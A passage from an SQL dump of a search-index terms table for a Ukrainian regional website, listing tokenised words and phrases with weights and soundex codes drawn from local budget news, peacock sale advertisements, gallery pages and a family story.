za',0,1,1.3,'T200',2,'*'),(1523611,'user','user',0,0,0.2667,'U260',88,'*'),(1523612,'vikonannya','vikonannya',0,0,0.6667,'V250',6,'*'),(1523613,'vikonannya dokhidnoji','vikonannya dokhidnoji',0,1,1.7,'V2532352',6,'*'),(1523614,'vikonannya dokhidnoji chastini','vikonannya dokhidnoji chastini',0,1,2,'V253235235',6,'*'),(1523615,'za','za',0,0,0.1333,'Z000',10,'*'),(1523618,'бюджетів','бюджетів',0,0,0.5333,'б000',5,'*'),(1523619,'бюджетів міст','бюджетів міст',0,1,1.4333,'б000',2,'*'),(1523620,'бюджетів міст районів','бюджетів міст районів',0,1,1.7,'б000',2,'*'),(1523621,'виконання','виконання',0,0,0.6,'в000',5,'*'),(1523622,'виконання дохідної','виконання дохідної',0,1,1.6,'в000',5,'*'),(1523623,'виконання дохідної частини','виконання дохідної частини',0,1,1.8667,'в000',5,'*'),(1523624,'даними','даними',0,0,0.4,'д000',9,'*'),(1523625,'даними департаменту','даними департаменту',0,1,1.6333,'д000',3,'*'),(1523626,'даними департаменту фінансів','даними департаменту фінансів',0,1,1.9333,'д000',3,'*'),(1523627,'департаменту','департаменту',0,0,0.8,'д000',3,'*'),(1523628,'департаменту фінансів','департаменту фінансів',0,1,1.7,'д000',3,'*'),(1523629,'департаменту фінансів житомирської','департаменту фінансів житомирської',0,1,2,'д000',2,'*'),(1523630,'дохідної','дохідної',0,0,0.5333,'д000',5,'*'),(1523631,'дохідної частини','дохідної частини',0,1,1.5333,'д000',5,'*'),(1523632,'дохідної частини бюджетів','дохідної частини бюджетів',0,1,1.8333,'д000',5,'*'),(1523633,'житомирської','житомирської',0,0,0.8,'ж000',8,'*'),(1523634,'житомирської ода','житомирської ода',0,1,1.5333,'ж000',5,'*'),(1523635,'за','за',0,0,0.1333,'з000',35,'*'),(1523638,'за даними','за даними',0,1,1.3,'з000',8,'*'),(1523639,'за даними департаменту','за даними департаменту',0,1,1.7333,'з000',3,'*'),(1523640,'міст','міст',0,0,0.2667,'м000',2,'*'),(1523641,'міст районів','міст районів',0,1,1.4,'м000',2,'*'),(1523642,'міст районів та','міст районів та',0,1,1.5,'м000',2,'*'),(1523643,'місяців','місяців',0,0,0.4667,'м000',6,'*'),(1523644,'місяців 2020','місяців 2020',0,1,1.4,'м000',2,'*'),(1523645,'місяців 2020 року','місяців 2020 року',0,1,1.5667,'м000',2,'*'),(1523646,'ода','ода',0,0,0.2,'о000',6,'*'),(1523647,'отг','отг',0,0,0.2,'о000',6,'*'),(1523648,'отг за','отг за',0,1,1.2,'о000',2,'*'),(1523650,'районів','районів',0,0,0.4667,'р000',2,'*'),(1523651,'районів та','районів та',0,1,1.3333,'р000',2,'*'),(1523652,'районів та отг','районів та отг',0,1,1.4667,'р000',2,'*'),(1523653,'року','року',0,0,0.2667,'р000',28,'*'),(1523654,'та','та',0,0,0.1333,'т000',30,'*'),(1523655,'та отг','та отг',0,1,1.2,'т000',2,'*'),(1523656,'та отг за','та отг за',0,1,1.3,'т000',2,'*'),(1523657,'фінансів','фінансів',0,0,0.5333,'ф000',6,'*'),(1523658,'фінансів житомирської','фінансів житомирської',0,1,1.7,'ф000',5,'*'),(1523659,'фінансів житомирської ода','фінансів житомирської ода',0,1,1.8333,'ф000',5,'*'),(1523660,'частини','частини',0,0,0.4667,'ч000',5,'*'),(1523661,'частини бюджетів','частини бюджетів',0,1,1.5333,'ч000',5,'*'),(1523662,'частини бюджетів міст','частини бюджетів міст',0,1,1.7,'ч000',2,'*'),(1523783,'05','05',0,0,0.2,'',1,'*'),(1523784,'05 12','05 12',0,1,1.1667,'',1,'*'),(1523785,'05 12 55','05 12 55',0,1,1.2667,'',1,'*'),(1523786,'06','06',0,0,0.2,'',3,'*'),(1523787,'06 05','06 05',0,1,1.1667,'',1,'*'),(1523788,'06 05 12','06 05 12',0,1,1.2667,'',1,'*'),(1523789,'12','12',0,0,0.2,'',8,'*'),(1523790,'12 55','12 55',0,1,1.1667,'',1,'*'),(1523791,'12 55 45','12 55 45',0,1,1.2667,'',1,'*'),(1523792,'2010','2010',0,0,0.4,'',3,'*'),(1523793,'2010 06','2010 06',0,1,1.2333,'',3,'*'),(1523794,'2010 06 05','2010 06 05',0,1,1.3333,'',1,'*'),(1523795,'45','45',0,0,0.2,'',2,'*'),(1523796,'55','55',0,0,0.2,'',1,'*'),(1523797,'55 45','55 45',0,1,1.1667,'',1,'*'),(1523798,'9','9',0,0,0.1,'',3,'*'),(1523799,'відомості','відомості',0,0,0.6,'в000',3,'*'),(1523800,'відомості про','відомості про',0,1,1.4333,'в000',3,'*'),(1523801,'відомості про район','відомості про район',0,1,1.6333,'в000',1,'*'),(1523802,'про','про',0,0,0.2,'п000',9,'*'),(1523803,'про район','про район',0,1,1.3,'п000',1,'*'),(1523804,'район','район',0,0,0.3333,'р000',2,'*'),(1523814,'03','03',0,0,0.2,'',1,'*'),(1523815,'03 57','03 57',0,1,1.1667,'',1,'*'),(1523816,'03 57 58','03 57 58',0,1,1.2667,'',1,'*'),(1523817,'06 03','06 03',0,1,1.1667,'',1,'*'),(1523818,'06 03 57','06 03 57',0,1,1.2667,'',1,'*'),(1523819,'06 06','06 06',0,1,1.1667,'',2,'*'),(1523820,'06 06 03','06 06 03',0,1,1.2667,'',1,'*'),(1523821,'2010 06 06','2010 06 06',0,1,1.3333,'',2,'*'),(1523822,'57','57',0,0,0.2,'',1,'*'),(1523823,'57 58','57 58',0,1,1.1667,'',1,'*'),(1523824,'58','58',0,0,0.2,'',1,'*'),(1523825,'істричний','істричний',0,0,0.6,'і000',1,'*'),(1523826,'істричний нарис','істричний нарис',0,1,1.5,'і000',1,'*'),(1523827,'нарис','нарис',0,0,0.3333,'н000',1,'*'),(1523829,'01','01',0,0,0.2,'',1,'*'),(1523830,'06 06 09','06 06 09',0,1,1.2667,'',1,'*'),(1523831,'06 09','06 09',0,1,1.1667,'',1,'*'),(1523832,'06 09 34','06 09 34',0,1,1.2667,'',1,'*'),(1523833,'09','09',0,0,0.2,'',2,'*'),(1523834,'09 34','09 34',0,1,1.1667,'',1,'*'),(1523835,'09 34 01','09 34 01',0,1,1.2667,'',1,'*'),(1523836,'14','14',0,0,0.2,'',4,'*'),(1523837,'34','34',0,0,0.2,'',3,'*'),(1523838,'34 01','34 01',0,1,1.1667,'',1,'*'),(1523839,'відеоогляд','відеоогляд',0,0,0.6667,'в000',1,'*'),(1523844,'82','82',0,0,0.2,'',1,'*'),(1523845,'fotogalereya','fotogalereya',0,0,0.8,'F3246',1,'*'),(1523846,'фотогалерея','фотогалерея',0,0,0.7333,'ф000',3,'*'),(1523854,'','',0,0,0,'',53,'*'),(1523855,'131','131',0,0,0.3,'',3,'*'),(1523856,'fotohalereia','fotohalereia',0,0,0.8,'F346',4,'*'),(1523929,'64','64',0,0,0.2,'',1,'*'),(1523930,'administrator','administrator',0,0,0.8667,'A3523636',2,'*'),(1523931,'administrator sajtu','administrator sajtu',0,1,1.6333,'A352363623',1,'*'),(1523932,'malehus','malehus',0,0,0.4667,'M420',4,'*'),(1523933,'malehus ukr','malehus ukr',0,1,1.3667,'M426',2,'*'),(1523934,'malehus ukr net','malehus ukr net',0,1,1.5,'M42653',2,'*'),(1523935,'net','net',0,0,0.2,'N300',2,'*'),(1523936,'sajtu','sajtu',0,0,0.3333,'S300',1,'*'),(1523937,'ukr','ukr',0,0,0.2,'U260',2,'*'),(1523938,'ukr net','ukr net',0,1,1.2333,'U2653',2,'*'),(1523939,'адміністратор','адміністратор',0,0,0.8667,'а000',2,'*'),(1523940,'адміністратор сайту','адміністратор сайту',0,1,1.6333,'а000',1,'*'),(1523941,'адміністратору','адміністратору',0,0,0.9333,'а000',1,'*'),(1523942,'адміністратору на','адміністратору на',0,1,1.5667,'а000',1,'*'),(1523943,'адміністратору на malehus','адміністратору на malehus',0,1,1.8333,'а542',1,'*'),(1523944,'ви','ви',0,0,0.1333,'в000',5,'*'),(1523945,'ви можете','ви можете',0,1,1.3,'в000',1,'*'),(1523946,'ви можете написати','ви можете написати',0,1,1.6,'в000',1,'*'),(1523947,'листа','листа',0,0,0.3333,'л000',1,'*'),(1523948,'листа адміністратору','листа адміністратору',0,1,1.6667,'л000',1,'*'),(1523949,'листа адміністратору на','листа адміністратору на',0,1,1.7667,'л000',1,'*'),(1523950,'можете','можете',0,0,0.4,'м000',1,'*'),(1523951,'можете написати','можете написати',0,1,1.5,'м000',1,'*'),(1523952,'можете написати листа','можете написати листа',0,1,1.7,'м000',1,'*'),(1523953,'на','на',0,0,0.1333,'н000',29,'*'),(1523954,'на malehus','на malehus',0,1,1.3333,'н542',1,'*'),(1523955,'на malehus ukr','на malehus ukr',0,1,1.4667,'н5426',1,'*'),(1523956,'написати','написати',0,0,0.5333,'н000',1,'*'),(1523957,'написати листа','написати листа',0,1,1.4667,'н000',1,'*'),(1523958,'написати листа адміністратору','написати листа адміністратору',0,1,1.9667,'н000',1,'*'),(1523959,'сайту','сайту',0,0,0.3333,'с000',2,'*'),(1524752,'2449','2449',0,0,0.4,'',1,'*'),(1524753,'260','260',0,0,0.3,'',1,'*'),(1524754,'260 телефонуйте','260 телефонуйте',0,1,1.5,'т000',1,'*'),(1524755,'260 телефонуйте домовимось','260 телефонуйте домовимось',0,1,1.8667,'т000',1,'*'),(1524756,'4hiex0smvhi','4hiex0smvhi',0,0,0.7333,'H251',1,'*'),(1524757,'chornikh','chornikh',0,0,0.5333,'C652',1,'*'),(1524758,'chornikh pavliniv','chornikh pavliniv',0,1,1.5667,'C6521451',1,'*'),(1524759,'com','com',0,0,0.2,'C500',10,'*'),(1524760,'com watch','com watch',0,1,1.3,'C532',4,'*'),(1524761,'com watch v','com watch v',0,1,1.3667,'C5321',4,'*'),(1524762,'http','http',0,0,0.2667,'H310',1,'*'),(1524763,'http www','http www',0,1,1.2667,'H310',1,'*'),(1524764,'http www youtube','http www youtube',0,1,1.5333,'H3131',1,'*'),(1524765,'molodikh','molodikh',0,0,0.5333,'M432',1,'*'),(1524766,'molodikh chornikh','molodikh chornikh',0,1,1.5667,'M432652',1,'*'),(1524767,'molodikh chornikh pavliniv','molodikh chornikh pavliniv',0,1,1.8667,'M4326521451',1,'*'),(1524768,'para','para',0,0,0.2667,'P600',2,'*'),(1524769,'para molodikh','para molodikh',0,1,1.4333,'P65432',1,'*'),(1524770,'para molodikh chornikh','para molodikh chornikh',0,1,1.7333,'P65432652',1,'*'),(1524771,'pavliniv','pavliniv',0,0,0.5333,'P451',2,'*'),(1524772,'prodaetsya','prodaetsya',0,0,0.6667,'P632',1,'*'),(1524773,'prodaetsya para','prodaetsya para',0,1,1.5,'P63216',1,'*'),(1524774,'prodaetsya para molodikh','prodaetsya para molodikh',0,1,1.8,'P632165432',1,'*'),(1524775,'v','v',0,0,0.0667,'V000',11,'*'),(1524776,'v 4hiex0smvhi','v 4hiex0smvhi',0,1,1.4333,'V251',1,'*'),(1524777,'watch','watch',0,0,0.3333,'W320',4,'*'),(1524778,'watch v','watch v',0,1,1.2333,'W321',4,'*'),(1524779,'watch v 4hiex0smvhi','watch v 4hiex0smvhi',0,1,1.6333,'W321251',1,'*'),(1524780,'www','www',0,0,0.2,'W000',5,'*'),(1524781,'www youtube','www youtube',0,1,1.3667,'W310',4,'*'),(1524782,'www youtube com','www youtube com',0,1,1.5,'W3125',4,'*'),(1524783,'youtube','youtube',0,0,0.4667,'Y310',4,'*'),(1524784,'youtube com','youtube com',0,1,1.3667,'Y3125',4,'*'),(1524785,'youtube com watch','youtube com watch',0,1,1.5667,'Y312532',4,'*'),(1524786,'є','є',0,0,0.0667,'є000',14,'*'),(1524787,'є можливість','є можливість',0,1,1.4,'є000',12,'*'),(1524788,'є можливість передати','є можливість передати',0,1,1.7,'є000',12,'*'),(1524789,'бердичів','бердичів',0,0,0.5333,'б000',13,'*'),(1524790,'бердичів вінницю','бердичів вінницю',0,1,1.5333,'б000',13,'*'),(1524791,'бердичів вінницю овруч','бердичів вінницю овруч',0,1,1.7333,'б000',11,'*'),(1524792,'в','в',0,0,0.0667,'в000',40,'*'),(1524793,'в київ','в київ',0,1,1.2,'в000',13,'*'),(1524794,'в київ житомир','в київ житомир',0,1,1.4667,'в000',13,'*'),(1524795,'відео','відео',0,0,0.3333,'в000',6,'*'),(1524796,'відео за','відео за',0,1,1.2667,'в000',4,'*'),(1524797,'відео за посиланням','відео за посиланням',0,1,1.6333,'в000',1,'*'),(1524798,'вінницю','вінницю',0,0,0.4667,'в000',13,'*'),(1524799,'вінницю овруч','вінницю овруч',0,1,1.4333,'в000',11,'*'),(1524800,'вінницю овруч за','вінницю овруч за',0,1,1.5333,'в000',1,'*'),(1524801,'домовимось','домовимось',0,0,0.6667,'д000',13,'*'),(1524802,'домовимось відео','домовимось відео',0,1,1.5333,'д000',4,'*'),(1524803,'домовимось відео за','домовимось відео за',0,1,1.6333,'д000',4,'*'),(1524804,'житомир','житомир',0,0,0.4667,'ж000',14,'*'),(1524805,'житомир бердичів','житомир бердичів',0,1,1.5333,'ж000',10,'*'),(1524806,'житомир бердичів вінницю','житомир бердичів вінницю',0,1,1.8,'ж000',10,'*'),(1524807,'за пару','за пару',0,1,1.2333,'з000',1,'*'),(1524808,'за пару 260','за пару 260',0,1,1.3667,'з000',1,'*'),(1524809,'за посиланням','за посиланням',0,1,1.4333,'з000',5,'*'),(1524810,'за посиланням http','за посиланням http',0,1,1.6,'з310',1,'*'),(1524811,'київ','київ',0,0,0.2667,'к000',13,'*'),(1524812,'київ житомир','київ житомир',0,1,1.4,'к000',13,'*'),(1524813,'київ житомир бердичів','київ житомир бердичів',0,1,1.7,'к000',10,'*'),(1524814,'маршрутками','маршрутками',0,0,0.7333,'м000',12,'*'),(1524815,'маршрутками в','маршрутками в',0,1,1.4333,'м000',12,'*'),(1524816,'маршрутками в київ','маршрутками в київ',0,1,1.6,'м000',12,'*'),(1524817,'можливість','можливість',0,0,0.6667,'м000',13,'*'),(1524818,'можливість передати','можливість передати',0,1,1.6333,'м000',12,'*'),(1524819,'можливість передати маршрутками','можливість передати маршрутками',0,1,2,'м000',12,'*'),(1524820,'молодих','молодих',0,0,0.4667,'м000',4,'*'),(1524821,'молодих чорних','молодих чорних',0,1,1.4667,'м000',1,'*'),(1524822,'молодих чорних павлінів','молодих чорних павлінів',0,1,1.7667,'м000',1,'*'),(1524823,'овруч','овруч',0,0,0.3333,'о000',12,'*'),(1524824,'овруч за','овруч за',0,1,1.2667,'о000',1,'*'),(1524825,'овруч за пару','овруч за пару',0,1,1.4333,'о000',1,'*'),(1524826,'павлінів','павлінів',0,0,0.5333,'п000',2,'*'),(1524827,'пара','пара',0,0,0.2667,'п000',2,'*'),(1524828,'пара молодих','пара молодих',0,1,1.4,'п000',1,'*'),(1524829,'пара молодих чорних','пара молодих чорних',0,1,1.6333,'п000',1,'*'),(1524830,'пару','пару',0,0,0.2667,'п000',1,'*'),(1524831,'пару 260','пару 260',0,1,1.2667,'п000',1,'*'),(1524832,'пару 260 телефонуйте','пару 260 телефонуйте',0,1,1.6667,'п000',1,'*'),(1524833,'передати','передати',0,0,0.5333,'п000',14,'*'),(1524834,'передати маршрутками','передати маршрутками',0,1,1.6667,'п000',12,'*'),(1524835,'передати маршрутками в','передати маршрутками в',0,1,1.7333,'п000',12,'*'),(1524836,'посиланням','посиланням',0,0,0.6667,'п000',5,'*'),(1524837,'посиланням http','посиланням http',0,1,1.5,'п310',1,'*'),(1524838,'посиланням http www','посиланням http www',0,1,1.6333,'п310',1,'*'),(1524839,'телефонуйте','телефонуйте',0,0,0.7333,'т000',10,'*'),(1524840,'телефонуйте домовимось','телефонуйте домовимось',0,1,1.7333,'т000',5,'*'),(1524841,'телефонуйте домовимось відео','телефонуйте домовимось відео',0,1,1.9333,'т000',4,'*'),(1524842,'чорних','чорних',0,0,0.4,'ч000',1,'*'),(1524843,'чорних павлінів','чорних павлінів',0,1,1.5,'ч000',1,'*'),(1524942,'06ulk','06ulk',0,0,0.3333,'U420',1,'*'),(1524943,'06ulk https','06ulk https',0,1,1.3667,'U42312',1,'*'),(1524944,'06ulk https www','06ulk https www',0,1,1.5,'U42312',1,'*'),(1524945,'150','150',0,0,0.3,'',2,'*'),(1524946,'150 телефонуйте','150 телефонуйте',0,1,1.5,'т000',2,'*'),(1524947,'150 телефонуйте домовимось','150 телефонуйте домовимось',0,1,1.8667,'т000',2,'*'),(1524948,'2450','2450',0,0,0.4,'',1,'*'),(1524949,'bili','bili',0,0,0.2667,'B400',2,'*'),(1524950,'bili pavlini','bili pavlini',0,1,1.4,'B4145',1,'*'),(1524951,'bu8wtab0tqy','bu8wtab0tqy',0,0,0.7333,'B3132',1,'*'),(1524952,'cax8y','cax8y',0,0,0.3333,'C000',1,'*'),(1524953,'cax8y 06ulk','cax8y 06ulk',0,1,1.3667,'C420',1,'*'),(1524954,'cax8y 06ulk https','cax8y 06ulk https',0,1,1.5667,'C42312',1,'*'),(1524955,'https','https',0,0,0.3333,'H312',12,'*'),(1524956,'https www','https www',0,1,1.3,'H312',4,'*'),(1524957,'https www youtube','https www youtube',0,1,1.5667,'H31231',3,'*'),(1524958,'ocgovvd8zdy','ocgovvd8zdy',0,0,0.7333,'O21323',1,'*'),(1524959,'ocgovvd8zdy https','ocgovvd8zdy https',0,1,1.5667,'O2132312',1,'*'),(1524960,'ocgovvd8zdy https www','ocgovvd8zdy https www',0,1,1.7,'O2132312',1,'*'),(1524961,'pavlini','pavlini',0,0,0.4667,'P450',1,'*'),(1524962,'v bu8wtab0tqy','v bu8wtab0tqy',0,1,1.4333,'V3132',1,'*'),(1524963,'v cax8y','v cax8y',0,1,1.2333,'V200',1,'*'),(1524964,'v cax8y 06ulk','v cax8y 06ulk',0,1,1.4333,'V242',1,'*'),(1524965,'v ocgovvd8zdy','v ocgovvd8zdy',0,1,1.4333,'V21323',1,'*'),(1524966,'v ocgovvd8zdy https','v ocgovvd8zdy https',0,1,1.6333,'V2132312',1,'*'),(1524967,'watch v bu8wtab0tqy','watch v bu8wtab0tqy',0,1,1.6333,'W3213132',1,'*'),(1524968,'watch v cax8y','watch v cax8y',0,1,1.4333,'W3212',1,'*'),(1524969,'watch v ocgovvd8zdy','watch v ocgovvd8zdy',0,1,1.6333,'W32121323',1,'*'),(1524970,'білі','білі',0,0,0.2667,'б000',2,'*'),(1524971,'білі павліни','білі павліни',0,1,1.4,'б000',1,'*'),(1524972,'в наявності','в наявності',0,1,1.3667,'в000',8,'*'),(1524973,'в наявності дві','в наявності дві',0,1,1.5,'в000',1,'*'),(1524974,'відео за посиланнями','відео за посиланнями',0,1,1.6667,'в000',3,'*'),(1524975,'вінницю овруч по','вінницю овруч по',0,1,1.5333,'в000',2,'*'),(1524976,'голубки','голубки',0,0,0.4667,'г000',1,'*'),(1524977,'голубки та','голубки та',0,1,1.3333,'г000',1,'*'),(1524978,'голубки та один','голубки та один',0,1,1.5,'г000',1,'*'),(1524979,'дві','дві',0,0,0.2,'д000',2,'*'),(1524980,'дві голубки','дві голубки',0,1,1.3667,'д000',1,'*'),(1524981,'дві голубки та','дві голубки та',0,1,1.4667,'д000',1,'*'),(1524982,'за посиланнями','за посиланнями',0,1,1.4667,'з000',3,'*'),(1524983,'за посиланнями https','за посиланнями https',0,1,1.6667,'з312',3,'*'),(1524984,'наявності','наявності',0,0,0.6,'н000',9,'*'),(1524985,'наявності дві','наявності дві',0,1,1.4333,'н000',1,'*'),(1524986,'наявності дві голубки','наявності дві голубки',0,1,1.7,'н000',1,'*'),(1524987,'овруч по','овруч по',0,1,1.2667,'о000',2,'*'),(1524988,'овруч по 150','овруч по 150',0,1,1.4,'о000',1,'*'),(1524989,'один','один',0,0,0.2667,'о000',5,'*'),(1524990,'один самець','один самець',0,1,1.3667,'о000',1,'*'),(1524991,'один самець є','один самець є',0,1,1.4333,'о000',1,'*'),(1524992,'павліни','павліни',0,0,0.4667,'п000',1,'*'),(1524993,'по','по',0,0,0.1333,'п000',22,'*'),(1524994,'по 150','по 150',0,1,1.2,'п000',2,'*'),(1524995,'по 150 телефонуйте','по 150 телефонуйте',0,1,1.6,'п000',2,'*'),(1524996,'посиланнями','посиланнями',0,0,0.7333,'п000',3,'*'),(1524997,'посиланнями https','посиланнями https',0,1,1.5667,'п312',3,'*'),(1524998,'посиланнями https www','посиланнями https www',0,1,1.7,'п312',3,'*'),(1524999,'самець','самець',0,0,0.4,'с000',1,'*'),(1525000,'самець є','самець є',0,1,1.2667,'с000',1,'*'),(1525001,'самець є можливість','самець є можливість',0,1,1.6333,'с000',1,'*'),(1525002,'та один','та один',0,1,1.2333,'т000',1,'*'),(1525003,'та один самець','та один самець',0,1,1.4667,'т000',1,'*'),(1525005,'180','180',0,0,0.3,'',1,'*'),(1525006,'180 телефонуйте','180 телефонуйте',0,1,1.5,'т000',1,'*'),(1525007,'180 телефонуйте домовимось','180 телефонуйте домовимось',0,1,1.8667,'т000',1,'*'),(1525008,'2019','2019',0,0,0.4,'',2,'*'),(1525009,'2019 року','2019 року',0,1,1.3,'р000',2,'*'),(1525010,'2019 року є','2019 року є',0,1,1.3667,'р000',1,'*'),(1525011,'2451','2451',0,0,0.4,'',1,'*'),(1525012,'chornokhvosta','chornokhvosta',0,0,0.8667,'C652123',1,'*'),(1525013,'chornokhvosta samka','chornokhvosta samka',0,1,1.6333,'C652123252',1,'*'),(1525014,'chornokhvosta samka pavlina','chornokhvosta samka pavlina',0,1,1.9,'C652123252145',1,'*'),(1525015,'nsxpoy-04gy','nsxpoy-04gy',0,0,0.7333,'N212',1,'*'),(1525016,'pavlina','pavlina',0,0,0.4667,'P450',1,'*'),(1525017,'samka','samka',0,0,0.3333,'S520',2,'*'),(1525018,'samka pavlina','samka pavlina',0,1,1.4333,'S52145',1,'*'),(1525019,'v nsxpoy-04gy','v nsxpoy-04gy',0,1,1.4333,'V5212',1,'*'),(1525020,'watch v nsxpoy-04gy','watch v nsxpoy-04gy',0,1,1.6333,'W3215212',1,'*'),(1525021,'в наявності самка','в наявності самка',0,1,1.5667,'в000',2,'*'),(1525022,'наявності самка','наявності самка',0,1,1.5,'н000',2,'*'),(1525023,'наявності самка 2019','наявності самка 2019',0,1,1.6667,'н000',1,'*'),(1525024,'овруч по 180','овруч по 180',0,1,1.4,'о000',1,'*'),(1525025,'павліна','павліна',0,0,0.4667,'п000',1,'*'),(1525026,'по 180','по 180',0,1,1.2,'п000',1,'*'),(1525027,'по 180 телефонуйте','по 180 телефонуйте',0,1,1.6,'п000',1,'*'),(1525028,'року є','року є',0,1,1.2,'р000',4,'*'),(1525029,'року є можливість','року є можливість',0,1,1.5667,'р000',4,'*'),(1525030,'самка','самка',0,0,0.3333,'с000',2,'*'),(1525031,'самка 2019','самка 2019',0,1,1.3333,'с000',1,'*'),(1525032,'самка 2019 року','самка 2019 року',0,1,1.5,'с000',1,'*'),(1525033,'самка павліна','самка павліна',0,1,1.4333,'с000',1,'*'),(1525034,'чорнохвоста','чорнохвоста',0,0,0.7333,'ч000',1,'*'),(1525035,'чорнохвоста самка','чорнохвоста самка',0,1,1.5667,'ч000',1,'*'),(1525036,'чорнохвоста самка павліна','чорнохвоста самка павліна',0,1,1.8333,'ч000',1,'*'),(1525099,'2453','2453',0,0,0.4,'',1,'*'),(1525100,'bannij','bannij',0,0,0.4,'B520',1,'*'),(1525101,'bannij den','bannij den',0,1,1.3333,'B5235',1,'*'),(1525102,'den','den',0,0,0.2,'D500',3,'*'),(1525103,'kingiv','kingiv',0,0,0.4,'K521',1,'*'),(1525104,'kingiv bannij','kingiv bannij',0,1,1.4333,'K52152',1,'*'),(1525105,'kingiv bannij den','kingiv bannij den',0,1,1.5667,'K5215235',1,'*'),(1525106,'pavliniv ta','pavliniv ta',0,1,1.3667,'P4513',1,'*'),(1525107,'pavliniv ta kingiv','pavliniv ta kingiv',0,1,1.6,'P45132521',1,'*'),(1525108,'ta kingiv','ta kingiv',0,1,1.3,'T2521',1,'*'),(1525109,'ta kingiv bannij','ta kingiv bannij',0,1,1.5333,'T252152',1,'*'),(1525110,'u','u',0,0,0.0667,'U000',5,'*'),(1525111,'u pavliniv','u pavliniv',0,1,1.3333,'U1451',1,'*'),(1525112,'u pavliniv ta','u pavliniv ta',0,1,1.4333,'U14513',1,'*'),(1525113,'банний','банний',0,0,0.4,'б000',1,'*'),(1525114,'банний день','банний день',0,1,1.3667,'б000',1,'*'),(1525115,'день','день',0,0,0.2667,'д000',5,'*'),(1525116,'кінгів','кінгів',0,0,0.4,'к000',1,'*'),(1525117,'кінгів банний','кінгів банний',0,1,1.4333,'к000',1,'*'),(1525118,'кінгів банний день','кінгів банний день',0,1,1.6,'к000',1,'*'),(1525119,'павлінів та','павлінів та',0,1,1.3667,'п000',1,'*'),(1525120,'павлінів та кінгів','павлінів та кінгів',0,1,1.6,'п000',1,'*'),(1525121,'та кінгів','та кінгів',0,1,1.3,'т000',1,'*'),(1525122,'та кінгів банний','та кінгів банний',0,1,1.5333,'т000',1,'*'),(1525123,'у','у',0,0,0.0667,'у000',23,'*'),(1525124,'у павлінів','у павлінів',0,1,1.3333,'у000',1,'*'),(1525125,'у павлінів та','у павлінів та',0,1,1.4333,'у000',1,'*'),(1525137,'25','25',0,0,0.2,'',10,'*'),(1525149,'malinshchini','malinshchini',0,0,0.8,'M4525',1,'*'),(1525168,'грудня','грудня',0,0,0.4,'г000',1,'*'),(1525171,'культури','культури',0,0,0.5333,'к000',1,'*'),(1525175,'малинщини','малинщини',0,0,0.6,'м000',1,'*'),(1525180,'народного','народного',0,0,0.6,'н000',1,'*'),(1525183,'о','о',0,0,0.0667,'о000',2,'*'),(1525186,'працівників','працівників',0,0,0.7333,'п000',1,'*'),(1526028,'2','2',0,0,0.1,'',35,'*'),(1526043,'8','8',0,0,0.1,'',27,'*'),(1526277,'novini','novini',0,0,0.4,'N150',21,'*'),(1526278,'novini 2','novini 2',0,1,1.2667,'N150',21,'*'),(1526279,'головна','головна',0,0,0.4667,'г000',4,'*'),(1526280,'132','132',0,0,0.3,'',3,'*'),(1526281,'qqq','qqq',0,0,0.2,'Q000',2,'*'),(1526794,'home','home',0,0,0.2667,'H500',1,'*'),(1527316,'інформація','інформація',0,0,0.6667,'і000',3,'*'),(1527326,'133','133',0,0,0.3,'',1,'*'),(1527327,'foto','foto',0,0,0.2667,'F300',3,'*'),(1527328,'foto ta','foto ta',0,1,1.2333,'F300',1,'*'),(1527329,'foto ta video','foto ta video',0,1,1.4333,'F313',1,'*'),(1527330,'ta video','ta video',0,1,1.2667,'T130',1,'*'),(1527331,'video','video',0,0,0.3333,'V300',3,'*'),(1527332,'та відео','та відео',0,1,1.2667,'т000',1,'*'),(1527333,'фото','фото',0,0,0.2667,'ф000',3,'*'),(1527334,'фото та','фото та',0,1,1.2333,'ф000',1,'*'),(1527335,'фото та відео','фото та відео',0,1,1.4333,'ф000',1,'*'),(1527341,'134','134',0,0,0.3,'',1,'*'),(1527342,'2456','2456',0,0,0.4,'',1,'*'),(1527343,'bajki','bajki',0,0,0.3333,'B200',1,'*'),(1527344,'didus','didus',0,0,0.3333,'D200',1,'*'),(1527345,'didus znav','didus znav',0,1,1.3333,'D251',1,'*'),(1527346,'didus znav sekret','didus znav sekret',0,1,1.5667,'D251263',1,'*'),(1527347,'dmitrovich','dmitrovich',0,0,0.6667,'D53612',1,'*'),(1527348,'dmitrovich mij','dmitrovich mij',0,1,1.4667,'D5361252',1,'*'),(1527349,'dmitrovich mij didus','dmitrovich mij didus',0,1,1.6667,'D536125232',1,'*'),(1527350,'dovgolittya','dovgolittya',0,0,0.7333,'D1243',1,'*'),(1527351,'dovgolittya ta','dovgolittya ta',0,1,1.4667,'D1243',1,'*'),(1527352,'dovgolittya ta lyubiv','dovgolittya ta lyubiv',0,1,1.7,'D124341',1,'*'),(1527353,'illya','illya',0,0,0.3333,'I400',1,'*'),(1527354,'illya dmitrovich','illya dmitrovich',0,1,1.5333,'I4353612',1,'*'),(1527355,'illya dmitrovich mij','illya dmitrovich mij',0,1,1.6667,'I435361252',1,'*'),(1527356,'lyubiv','lyubiv',0,0,0.4,'L100',1,'*'),(1527357,'lyubiv rozpovidati','lyubiv rozpovidati',0,1,1.6,'L16213',1,'*'),(1527358,'lyubiv rozpovidati narodni','lyubiv rozpovidati narodni',0,1,1.8667,'L162135635',1,'*'),(1527359,'mij','mij',0,0,0.2,'M200',1,'*'),(1527360,'mij didus','mij didus',0,1,1.3,'M232',1,'*'),(1527361,'mij didus znav','mij didus znav',0,1,1.4667,'M23251',1,'*'),(1527362,'narodni','narodni',0,0,0.4667,'N635',1,'*'),(1527363,'narodni bajki','narodni bajki',0,1,1.4333,'N63512',1,'*'),(1527364,'protsik','protsik',0,0,0.4667,'P632',1,'*'),(1527365,'protsik illya','protsik illya',0,1,1.4333,'P6324',1,'*'),(1527366,'protsik illya dmitrovich','protsik illya dmitrovich',0,1,1.8,'P6324353612',1,'*'),(1527367,'rozpovidati','rozpovidati',0,0,0.7333,'R213',1,'*'),(1527368,'rozpovidati narodni','rozpovidati narodni',0,1,1.6333,'R2135635',1,'*'),(1527369,'rozpovidati narodni bajki','rozpovidati narodni bajki',0,1,1.8333,'R213563512',1,'*'),(1527370,'sekret','sekret',0,0,0.4,'S630',1,'*'),(1527371,'sekret dovgolittya','sekret dovgolittya',0,1,1.6,'S631243',1,'*'),(1527372,'sekret dovgolittya ta','sekret dovgolittya ta',0,1,1.7,'S631243',1,'*'),(1527373,'ta lyubiv','ta lyubiv',0,1,1.3,'T410',1,'*'),(1527374,'ta lyubiv rozpovidati','ta lyubiv rozpovidati',0,1,1.7,'T416213',1,'*'),(1527375,'znav','znav',0,0,0.2667,'Z510',1,'*'),(1527376,'znav 